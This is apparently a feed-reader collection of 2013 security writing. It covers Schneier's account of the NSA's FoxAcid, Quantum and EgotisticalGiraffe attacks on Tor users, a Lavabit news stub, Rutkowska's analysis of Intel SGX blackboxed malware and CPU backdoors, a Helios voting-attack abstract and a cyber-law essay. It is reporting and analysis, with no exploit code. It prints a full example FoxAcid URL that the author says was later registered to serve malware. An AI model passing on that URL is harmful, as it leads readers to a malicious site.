According to the training presentation provided by Snowden, EgotisticalGiraffe exploits a type confusion vulnerability in E4X, which is an XML extension for JavaScript. This vulnerability exists in Firefox 11.0 -- 16.0.2, as well as Firefox 10.0 ESR -- the Firefox version used until recently in the Tor browser bundle. According to another document, the vulnerability exploited by EgotisticalGiraffe was inadvertently fixed when Mozilla removed the E4X library with the vulnerability, and when Tor added that Firefox version into the Tor browser bundle, but NSA were confident that they would be able to find a replacement Firefox exploit that worked against version 17.0 ESR.

The Quantum system

To trick targets into visiting a FoxAcid server, the NSA relies on its secret partnerships with US telecoms companies. As part of the Turmoil system, the NSA places secret servers, codenamed Quantum, at key places on the Internet backbone. This placement ensures that they can react faster than other websites can. By exploiting that speed difference, these servers can impersonate a visited website to the target before the legitimate website can respond, thereby tricking the target's browser to visit a Foxacid server.

In the academic literature, these are called "man-in-the-middle" attacks, and have been known to the commercial and academic security communities. More specifically, they are examples of "man-on-the-side" attacks.

They are hard for any organization other than the NSA to reliably execute, because they require the attacker to have a privileged position on the Internet backbone, and exploit a "race condition" between the NSA server and the legitimate website. This top-secret NSA diagram, made public last month, shows a Quantum server impersonating Google in this type of attack.

The NSA uses these fast Quantum servers to execute a packet injection attack, which surreptitiously redirects the target to the FoxAcid server. An article in the German magazine Spiegel, based on additional top secret Snowden documents, mentions an NSA developed attack technology with the name of QuantumInsert that performs redirection attacks. Another top-secret Tor presentation provided by Snowden mentions QuantumCookie to force cookies onto target browsers, and another Quantum program to "degrade/deny/disrupt Tor access".

This same technique is used by the Chinese government to block its citizens from reading censored Internet content, and has been hypothesized as a probable NSA attack technique.

The FoxAcid system

According to various top-secret documents provided by Snowden, FoxAcid is the NSA codename for what the NSA calls an "exploit orchestrator," an Internet-enabled system capable of attacking target computers in a variety of different ways. It is a Windows 2003 computer configured with custom software and a series of Perl scripts. These servers are run by the NSA's tailored access operations, or TAO, group. TAO is another subgroup of the systems intelligence directorate.

The servers are on the public Internet. They have normal-looking domain names, and can be visited by any browser from anywhere; ownership of those domains cannot be traced back to the NSA.

However, if a browser tries to visit a FoxAcid server with a special URL, called a FoxAcid tag, the server attempts to infect that browser, and then the computer, in an effort to take control of it. The NSA can trick browsers into using that URL using a variety of methods, including the race-condition attack mentioned above and frame injection attacks.

FoxAcid tags are designed to look innocuous, so that anyone who sees them would not be suspicious. http://baseball2.2ndhalfplays.com/nested/attribs/bins/1/define/forms9952_z1zzz.html is an example of one such tag, given in another top-secret training presentation provided by Snowden.

There is no currently registered domain name by that name; it is just an example for internal NSA training purposes.

The training material states that merely trying to visit the homepage of a real FoxAcid server will not result in any attack, and that a specialized URL is required. This URL would be created by TAO for a specific NSA operation, and unique to that operation and target. This allows the FoxAcid server to know exactly who the target is when his computer contacts it.

According to Snowden, FoxAcid is a general CNE system, used for many types of attacks other than the Tor attacks described here. It is designed to be modular, with flexibility that allows TAO to swap and replace exploits if they are discovered, and only run certain exploits against certain types of targets.

The most valuable exploits are saved for the most important targets. Low-value exploits are run against technically sophisticated targets where the chance of detection is high. TAO maintains a library of exploits, each based on a different vulnerability in a system. Different exploits are authorized against different targets, depending on the value of the target, the target's technical sophistication, the value of the exploit, and other considerations.

In the case of Tor users, FoxAcid might use EgotisticalGiraffe against their Firefox browsers.

FoxAcid servers also have sophisticated capabilities to avoid detection and to ensure successful infection of its targets. One of the top-secret documents provided by Snowden demonstrates how FoxAcid can circumvent commercial products that prevent malicious software from making changes to a system that survive a reboot process.

According to a top-secret operational management procedures manual provided by Snowden, once a target is successfully exploited it is infected with one of several payloads. Two basic payloads mentioned in the manual are designed to collect configuration and location information from the target computer so an analyst can determine how to further infect the computer.

These decisions are made in part by the technical sophistication of the target and the security software installed on the target computer, called Personal Security Products or PSP, in the manual.

FoxAcid payloads are updated regularly by TAO. For example, the manual refers to version 8.2.1.1 of one of them.

FoxAcid servers also have sophisticated capabilities to avoid detection and to ensure successful infection of its targets. The operations manual states that a FoxAcid payload with the codename DireScallop can circumvent commercial products that prevent malicious software from making changes to a system that survive a reboot process.

The NSA also uses phishing attacks to induce users to click on FoxAcid tags.

TAO additionally uses FoxAcid to exploit callbacks -- which is the general term for a computer infected by some automatic means -- calling back to the NSA for more instructions and possibly to upload data from the target computer.

According to a top-secret operational management procedures manual, FoxAcid servers configured to receive callbacks are codenamed FrugalShot. After a callback, the FoxAcid server may run more exploits to ensure that the target computer remains compromised long term, as well as install "implants" designed to exfiltrate data.

By 2008, the NSA was getting so much FoxAcid callback data that they needed to build a special system to manage it all.


This essay previously appeared in the Guardian. It is the technical article associated with this more general-interest article. I also wrote two commentaries on the material.

EDITED TO ADD: Here is the source material we published. The Washington Post published its own story independently, based on some of the same source material and some new source material.

Here's the official US government response to the story.

The Guardian decided to change the capitalization of the NSA codenames. They should properly be in all caps: FOXACID, QUANTUMCOOKIE, EGOTISTICALGIRAFFE, TURMOIL, and so on.

This is the relevant quote from the Spiegel article:

According to the slides in the GCHQ presentation, the attack was directed at several Belgacom employees and involved the planting of a highly developed attack technology referred to as a "Quantum Insert" ("QI"). It appears to be a method with which the person being targeted, without their knowledge, is redirected to websites that then plant malware on their computers that can then manipulate them. Some of the employees whose computers were infiltrated had "good access" to important parts of Belgacom's infrastructure, and this seemed to please the British spies, according to the slides.

That should be "QUANTUMINSERT." This is getting frustrating. The NSA really should release a style guide for press organizations publishing their secrets.

And the URL in the essay (now redacted at the Guardian site) was registered within minutes of the story posting, and is being used to serve malware. Don't click on it.

03 Oct 08:54

Lavabit got order for Snowden’s login info, then gov’t demanded site’s SSL key

by Cyrus Farivar

The American government obtained a secret order from a federal judge in Virginia demanding that Lavabit hand over its private SSL key, enabling authorities to access Edward Snowden’s e-mail—and e-mail belonging to Lavabit's 400,000 other users as well. That sealed order, dated July 10 2013, was first published on Wednesday by Wired reporter Kevin Poulsen.

A judge at the Fourth Circuit Court of Appeals, where the case is currently being heard, unsealed the set of court documents on Wednesday.

Lavabit, the Texas-based e-mail provider, provided secure e-mail services to thousands of people, including Snowden, the former National Security Agency contractor. Neither Ladar Levison, the owner of the shuttered e-mail service, nor his attorney Jesse Binnall immediately responded to Ars’ request for comment. However, Ars also received a copy of the unsealed documents from the Lavabit defense team.

Read 10 remaining paragraphs | Comments


    






28 Sep 16:32

Thoughts on Intel's upcoming Software Guard Extensions (Part 2)

by Joanna Rutkowska

In the first part of this article published a few weeks ago, I have discussed the basics of Intel SGX technology, and also discussed challenges with using SGX for securing desktop systems, specifically focusing on the problem of trusted input and output. In this part we will look at some other aspects of Intel SGX, and we will start with a discussion of how it could be used to create a truly irreversible software.

SGX Blackboxing – Apps and malware that cannot be reverse engineered?

A nice feature of Intel SGX is that the processor automatically encrypts the content of SGX-protected memory pages whenever it leaves the processor caches and is stored in DRAM. In other words the code and data used by SGX enclaves never leave the processor in plaintext.

This feature, no doubt influenced by the DRM industry, might profoundly change our approach as to who controls our computers really. This is because it will now be easy to create an application, or malware for that matter, that just cannot be reversed engineered in any way. No more IDA, no more debuggers, not even kernel debuggers, could reveal the actual intentions of the EXE file we're about to run.

Consider the following scenario, where a user downloads an executable, say blackpill.exe, which in fact logically consists of three parts:

  1. A 1st stage loader (SGX loader) which is unencrypted, and which task is to setup an SGX enclave, copy the rest of the code there, specifically the 2nd stage loader, and then start executing the 2nd stage loader...
  2. The 2nd stage loader, which starts executing within the enclave, performs remote attestation with an external server and, in case the remote attestation completes successfully, obtains a secret key from the remote server. This code is also delivered in plaintext too.
  3. Finally the encrypted blob which can only be decrypted using the key obtained by the 2nd stage loader from the remote server, and which contains the actual logic of the application (or malware).

We can easily see that there is no way for the user to figure out what the code from the encrypted blob is going to do on her computer. This is because the key will be released by the remote server only if the 2nd stage loader can prove via remote attestation that it indeed executes within a protect SGX enclave and that it is the original unmodified loader code that the application's author created. Should one bit of this loader be modified, or should it be attempted to run outside of an SGX enclave, or within a somehow misconfigured SGX enclave, then the remote attestation would fail and the key will not be obtained.

And once the key is obtained, it is available only within the SGX enclave. It cannot be found in DRAM or on the memory bus, even if the user had access to expensive DRAM emulators or bus sniffers. And the key cannot also be mishandled by the code that runs in the SGX enclave, because remote attestation also proved that the loader code has not been modified, and the author wrote the loader specifically not to mishandle the key in any way (e.g. not to write it out somewhere to unprotected memory, or store on the disk). Now, the loader uses the key to decrypt the payload, and this decrypted payload remains within secure enclave, never leaving it, just like the key. It's data never leaves the enclave either...

One little catch is how the key is actually sent to the SGX-protected enclave so that it could not be spoofed in the middle? Of course it must be encrypted, but to which key? Well, we can have our 2nd stage loader generate a new key pair and send the public key to the remote server – the server will then use this public key to send the actual decryption key encrypted with this loader's public key. This is almost good, except for the fact that this scheme is not immune to a classic main in the middle attack. The solution to this is easy, though – if I understand correctly the description of the new Quoting and Sealing operations performed by the Quoting Enclave – we can include the generated public key hash as part of the data that will be signed and put into the Quote message, so the remote sever can be assured also that the public key originates from the actual code running in the SGX enclave and not from Mallory somewhere in the middle.

So, what does the application really do? Does it do exactly what has been advertised by its author? Or does it also “accidentally” sniffs some system memory or even reads out disk sectors and sends the gathered data to a remote server, encrypted, of course? We cannot know this. And that's quite worrying, I think.

One might say that we do accept all the proprietary software blindly anyway – after all who fires up IDA to review MS Office before use? Or MS Windows? Or any other application? Probably very few people indeed. But the point is: this could be done, and actually some brave souls do that. This could be done even if the author used some advanced form of obfuscation. Can be done, even if taking lots of time. Now, with Intel SGX it suddenly cannot be done anymore. That's quite a revolution, complete change of the rules. We're no longer masters of our little universe – the computer system – and now somebody else is.

Unless there was a way for “Certified Antivirus companies” to get around SGX protection.... (see below for more discussion on this).

...And some good applications of SGX

The SGX blackboxing has, however, some good usages too, beyond protecting the Hollywood productions, and making malware un-analyzable...

One particularly attractive possibility is the “trusted cloud” where VMs offered to users could not be eavesdropped or tampered by the cloud provider admins. I wrote about such possibility two years ago, but with Intel SGX this could be done much, much better. This will, of course, require a specially written hypervisor which would be setting up SGX containers for each of the VM, and then the VM could authenticate to the user and prove, via remote attestation, that it is executing inside a protected and properly set SGX enclave. Note how this time we do not require the hypervisor to authenticate to the users – we just don't care, if our code correctly attests that it is in a correct SGX, it's all fine.

Suddenly Google could no longer collect and process your calendar, email, documents, and medial records! Or how about a tor node that could prove to users that it is not backdoored by its own admin and does not keep a log of how connections were routed? Or a safe bitcoin web-based wallet? It's hard to overestimate how good such a technology might be for bringing privacy to the wide society of users...

Assuming, of course, there was no backdoor for the NSA to get around the SGX protection and ruin this all goodness...(see below for more discussion on this).

New OS and VMM architectures

In the paragraph above I mentioned that we will need specially written hypervisors (VMMs) that will be making use of SGX in order to protect the user's VMs against themselves (i.e. against the hypervisor). We could go further and put other components of a VMM into protected SGX enclaves, things that we currently, in Qubes OS, keep in separate Service VMs, such as networking stacks, USB stacks, etc. Remember that Intel SGX provides convenient mechanism to build inter-enclave secure communication channels.

We could also take the “GUI domain” (currently this is just Dom0 in Qubes OS) and move it into a separate SGX enclave. If only Intel came up with solid protected input and output technologies that would work well with SGX, then this would suddenly make whole lots of sense (unlike currently where it is very challenging). What we win this way is that no longer a bug in the hypervisor should be critical, as it would be now a long way for the attacker who compromised the hypervisor to steal any real secret of the user, because there are no secrets in the hypervisor itself.

In this setup the two most critical enclaves are: 1) the GUI enclave, of course, and 2) the admin enclave, although it is thinkable that the latter could be made reasonably deprivileged in that it might only be allowed to create/remove VMs, setup networking and other policies for them, but no longer be able to read and write memory of the VMs (Anti Snowden Protection, ASP?).

And... why use hypervisors? Why not use the same approach to compartmentalize ordinary operating systems? Well, this could be done, of course, but it would require considerable rewrite of the systems, essentially turning them into microkernels (except for the fact that the microkernel would no longer need to be trusted), as well as the applications and drivers, and we know that this will never happen. Again, let me repeat one more time: the whole point of using virtualization for security is that it wraps up all the huge APIs of an ordinary OS, like Win32 or POSIX, or OSX, into a virtual machine that itself requires orders of magnitude simpler interface to/from the outside world (especially true for paravirtualized VMs), and all this without the need to rewrite the applications.

Trusting Intel – Next Generation of Backdooring?

We have seen that SGX offers a number of attractive functionality that could potentially make our digital systems more secure and 3rd party servers more trusted. But does it really?

The obvious question, especially in the light of recent revelations about NSA backdooring everything and the kitchen sink, is whether Intel will have backdoors allowing “privileged entities” to bypass SGX protections?

Traditional CPU backdooring

Of course they could, no question about it. But one can say that Intel (as well as AMD) might have been having backdoors in their processors for a long time, not necessarily in anything related to SGX, TPM, TXT, AMT, etc. Intel could have built backdoors into simple MOV or ADD instructions, in such a way that they would automatically disable ring/page protections whenever executed with some magic arguments. I wrote more about this many years ago.

The problem with those “traditional” backdoors is that Intel (or a certain agency) could be caught using it, and this might have catastrophic consequences for Intel. Just imagine somebody discovered (during a forensic analysis of an incident) that doing:

MOV eax, $deadbeef
MOV ebx, $babecafe
ADD eax, ebx

...causes ring elevation for the next 1000 cycles. All the processors affected would suddenly became equivalents of the old 8086 and would have to be replaced. Quite a marketing nightmare I think, no?

Next-generation CPU backdooring

But as more and more crypto and security mechanisms got delegated from software to the processor, the more likely it becomes for Intel (or AMD) to insert really “plausibly deniable” backdoors into processors.

Consider e.g. the recent paper on how to plant a backdoor into the Intel's Ivy Bridge's random number generator (usable via the new RDRAND instruction). The backdoor reduces the actual entropy of the generator making it feasible to later brute-force any crypto which uses keys generated via the weakened generator. The paper goes into great lengths describing how this backdoor could be injected by a malicious foundry (e.g. one in China), behind the Intel's back, which is achieved by implementing the backdoor entirely below the HDL level. The paper takes a “classic” view on the threat model with Good Americans (Intel engineers) and the Bad Chinese (foundry operators/employees). Nevertheless, it should be obvious that Intel could have planted such a backdoor without any effort or challenge described in the paper, because they could do so at any level, not necessarily below HDL.

But backdooring an RNG is still something that leaves traces. Even though the backdoored processor can apparently pass all external “randomness” testes, such as the NIST testsuite, they still might be caught. Perhaps because somebody will buy 1000 processors and will run them for a year and will note down all the numbers generated and then conclude that the distribution is quite not right. Or something like that. Or perhaps because somebody will reverse-engineer the processor and specifically the RNG circuitry and notice some gates are shorted to GND. Or perhaps because somebody at this “Bad Chinese” foundry will notice that.

Let's now get back to Intel SGX -- what is the actual Root of Trust for this technology? Of course, the processor, just like for the old ring3/ring0 separation. But for SGX there is additional Root of Trust which is used for remote attestation, and this is the private key(s) used for signing the Quote Messages.

If the signing private key somehow got into the hands of an adversary, the remote attestation breaks down completely. Suddenly the “SGX Blackboxed” apps and malware can readily be decrypted, disassembled and reverse engineered, because the adversary can now emulate their execution step by step under a debugger and still pass the remote attestation. We might say this is good, as we don't want irreversible malware and apps. But then, suddenly, we also loose our attractive “trusted cloud” too – now there is nothing that could stop the adversary, who has the private signing key, to run our trusted VM outside of SGX, yet still reporting to us that it is SGX-protected. And so, while we believe that our trusted VM should be trusted and unsniffable, and while we devote all our deepest secrets to it, the adversary can read them all like on a plate.

And the worst thing is – even if somebody took such a processor, disassembled it into pieces, analyzed transitor-by-transitor, recreated HDL, analyzed it all, then still it all would look good. Because the backdoor is... the leaked private key that is now also in the hands of the adversary, and there is no way to prove it by looking at the processor alone.

As I understand, the whole idea of having a separate TPM chip, was exactly to make such backdoor-by-leaking-keys more difficult, because, while we're all forced to use Intel or AMD processors today, it is possible that e.g. every country can produce their own TPM, as it's million times less complex than a modern processor. So, perhaps Russia could use their own TPMs, which they might be reasonably sure they use private keys which have not be handed over to the NSA.

However, as I mentioned in the first part of this article, sadly, this scheme doesn't work that well. The processor can still cheat the external TPM module. For example, in case of an Intel TXT and TPM – the processor can produce incorrect PCR values in response to certain trigger – in that case it no longer matters that the TPM is trusted and keys not leaked, because the TPM will sign wrong values. On the other hand we go back now to using “traditional” backdoors in the processors, whose main disadvantage is that people might got cought using them (e.g. somebody analyzed an exploit which turns out to be triggering correct Quote message despite incorrect PCRs).

So, perhaps, the idea of separate TPM actually does make some sense after all?

What about just accidental bugs in Intel products?

Conspiracy theories aside, what about accidental bugs? What are the chances of SGX being really foolproof, at least against those unlucky adversaries who didn't get access to the private signing keys? The Intel's processor have become quite a complex beasts these days. And if you also thrown in the Memory Controller Hub, it's unimaginably complex beast.

Let's take a quick tour back discussing some spectacular attacks against Intel “hardware” security mechanisms. I wrote “hardware” in quotation marks, because really most of these technologies is software, like most of the things in electronics these days. Nevertheless the “hardware enforced security” does have a special appeal to lots of people, often creating an impression that these must be some ultimate unbreakable technologies....

I think it all started with our exploit against Intel Q35 chipset (slides 15+) demonstrated back in 2008 which was the first attack allowing to compromise, otherwise hardware-protected, SMM memory on Intel platforms (some other attacks against SMM shown before assumed the SMM was not protected, which was the case on many older platforms).

This was then shortly followed by another paper from us about attacking Intel Trusted Execution Technology (TXT), which found out and exploited a fact that TXT-loaded code was not protected against code running in the SMM mode. We used our previous attack on Q35 against SMM, as well as found a couple of new ones, in order to compromise SMM, plant a backdoor there, and then compromise TXT-loaded code from there. The issue highlighted in the paper has never really been correctly patched. Intel has spent years developing something they called STM, which was supposed to be a thin hypervisor for SMM code sandboxing. I don't know if the Intel STM specification has eventually been made public, and how many bugs it might be introducing on systems using it, or how much inaccurate it might be.

In the following years we presented two more devastating attacks against Intel TXT (none of which depending on compromised SMM): one which exploited a subtle bug in the processor SINIT module allowing to misconfigure VT-d protections for TXT-loaded code, and another one exploiting a classic buffer overflow bug also in the processor's SINIT module, allowing this time not only to fully bypass TXT, but also fully bypass Intel Launch Control Policy and hijack SMM (several years after our original papers on attacking SMM the old bugs got patched and so this was also attractive as yet another way to compromise SMM for whatever other reason).

Invisible Things Lab has also presented first, and as far as I'm aware still the only one, attack on Intel BIOS that allowed to reflash the BIOS despite Intel's strong “hardware” protection mechanism to allow only digitally signed code to be flashed. We also found out about secret processor in the chipset used for execution of Intel AMT code and we found a way to inject our custom code into this special AMT environment and have it executed in parallel with the main system, unconstrained by any other entity.

This is quite a list of Intel significant security failures, which I think gives something to think about. At the very least that just because something is “hardware enforced” or “hardware protected” doesn't mean it is foolproof against software exploits. Because, it should be clearly said, all our exploits mentioned above were pure software attacks.

But, to be fair, we have never been able to break Intel core memory protection (ring separation, page protection) or Intel VT-x. Rafal Wojtczuk has probably came closest with his SYSRET attack in an attempt to break the ring separation, but ultimately the Intel's excuse was that the problem was on the side of the OS developers who didn't notice subtle differences in the behavior of SYSRET between AMD and Intel processors, and didn't make their kernel code defensive enough against Intel processor's odd behavior.

We have also demonstrated rather impressive attacks bypassing Intel VT-d, but, again, to be fair, we should mention that the attacks were possible only on those platforms which Intel didn't equip with so called Interrupt Remapping hardware, and that Intel knew that such hardware was indeed needed and was planning it a few years before our attacks were published.

So, is Intel SGX gonna be as insecure as Intel TXT, or as secure as Intel VT-x....?

The bottom line

Intel SGX promises some incredible functionality – to create protected execution environments (called enclaves) within untrusted (compromised) Operating System. However, for SGX to be of any use on a client OS, it is important that we also have technologies to implement trusted output and input from/to the SGX enclave. Intel currently provides little details about the former and openly admits it doesn't have the later.

Still, even without trusted input and output technologies, SGX might be very useful in bringing trust to the cloud, by allowing users to create trusted VMs inside untrusted provider infrastructure. However, at the same time, it could allow to create applications and malware that could not be reversed engineered. It's quote ironic that those two applications (trusted cloud and irreversible malware) are mutually bound together, so that if one wanted to add a backdoor to allow A/V industry to be able to analyze SGX-protected malware, then this very same backdoor could be used to weaken the guarantees of the trustworthiness of the user VMs in the cloud.

Finally, a problem that is hard to ignore today, in the post-Snowden world, is the ease of backdooring this technology by Intel itself. In fact Intel doesn't need to add anything to their processors – all they need to do is to give away the private signing keys used by SGX for remote attestation. This makes for a perfectly deniable backdoor – nobody could catch Intel on this, even if the processor was analyzed transistor-by-transistor, HDL line-by-line.

As a system architect I would love to have Intel SGX, and I would love to believe it is secure. It would allow to further decompose Qubes OS, specifically get rid of the hypervisor from the TCB, and probably even more.

Special thanks to Oded Horowitz for turning my attention towards Intel SGX.
28 Sep 16:29

Attacking and fixing Helios: An analysis of ballot secrecy, by Veronique Cortier and Ben Smyth

Helios 2.0 is an open-source web-based end-to-end verifiable electronic voting system, suitable for use in low-coercion environments. In this article, we analyse ballot secrecy in Helios and discover a vulnerability which allows an adversary to compromise the privacy of voters. The vulnerability exploits the absence of ballot independence in Helios and works by replaying a voter's ballot or a variant of it, the replayed ballot magnifies the voter's contribution to the election outcome and this magnification can be used to violated privacy. We demonstrate the practicality of the attack by violating a voter's privacy in a mock election using the software implementation of Helios. Moreover, the feasibility of an attack is considered in the context of French legislative elections and, based upon our findings, we believe it constitutes a real threat to ballot secrecy. We present a fix and show that our solution satisfies a formal definition of ballot secrecy using the applied pi calculus. Furthermore, we present similar vulnerabilities in other electronic voting protocols -- namely, the schemes by Lee et al., Sako & Kilian, and Schoenmakers -- which do not assure ballot independence. Finally, we argue that independence and privacy properties are unrelated, and non-malleability is stronger than independence.
27 Sep 07:32

Guest Post: Resolving Cyber Issues Sets the State for Future Weapons

by Eric Jensen

[A note from Ryan Goodman: On Monday, Professor Michael Schmitt helped launch Just Security with a Guest Post on the law of cyber conflict. Professor Eric Talbot Jensen accepted our invitation to write on the topic of the next generation of technology and the law of armed conflict (LOAC), especially in light of his forthcoming article, The Future of the Law of Armed Conflict: Ostriches, Butterflies, and Nanobots, 35 Michigan Journal of International Law (forthcoming 2014). I encourage readers who are interested in this topic to read Eric’s full-length article as well. It is a great exploration of the next technological frontier for LOAC.]

As observed by former legal advisor to the U.S. State Department, Harold Koh, “Increasingly, we find ourselves addressing twenty-first century challenges with twentieth-century laws.”  This has become a common mantra among those who are tasked with applying current law to modern warfare.  Nowhere has this discussion been more hotly debated than in the area of cyber warfare, with academics, practitioners and even governments taking views across the spectrum; some advocate that the current law is sufficient to regulate cyber warfare with no modification, others argue that current law is a solid foundation but some modification or evolution may be necessary, and still others advocate for new laws to adequately regulate this new technology.

With respect to the vast majority of armed conflicts that will occur in the near future, I place myself in the middle category, believing that for most armed conflicts, current laws concerning jus ad bellum and jus in bello are sufficient.  However, as advancing weapons technologies make their way into armed conflicts, their use will require an evolution of how we understand and apply certain legal principles.  For example, within the jus in bello, the current definition of “attack” as an act of violence may be too narrow to account for the broadened spectrum of activities that can be accomplished through cyber means.  These activities may not look like traditional “violence” but may still leave the victim feeling “attacked.”  Similarly, our understanding of the fundamental principles of distinction and discrimination may need to adapt to cyber tools that infect hundreds of thousands of computers, including civilian computers, in order to specifically “attack” one targeted system which is a lawful military objective.  The recently published Tallinn Manual on the International Law Applicable to Cyber Warfare acknowledges many of these concerns, and recognizes current law may need to evolve to adequately address possible uses of cyber capabilities.

The resolution of how the law applies to cyber technologies is vitally important for the use of cyber in future conflicts.  It will also likely set the stage for resolving similar questions with respect to a host of future technologies that are waiting in the wings.

For example, the processes of miniaturization and the weaponization of nanotechnology promise to create a host of weapons that will challenge the traditional application of the current law.  Nanobots will be invisible to the naked eye and can swarm across a border and implant themselves in people or on materiel and collect data. Such an operation may be analogous to traditional spying, but a country that is subject to millions of these nanocollectors may feel the victim of a use of force or armed attack, especially if the same nanobots also carry a latent destructive capability that can be triggered remotely at some time in the future.

Similarly, advances in genomics and virology may allow the creation of a virus coded specifically to an individual’s DNA or group’s genetic or chemical characteristics.  Like computer malware, the virus may infect numerous “hosts” without doing much harm other than creating a mass transport system of sneezing or coughing to get the virus to the intended target where it has lethal effect.  Advanced weapons such as micro drones, robots and other autonomous weapons systems will also put pressure on the specific application of current legal norms.

With advanced technologies on the cusp of development and employment such as those mentioned above, the resolution of the legal issues surrounding cyber operations will set the stage for similar resolution of these advancing technologies.  Effectively evolving legal norms to regulate cyber operations will allow the international community to adapt the law adequately to cover future weapon systems.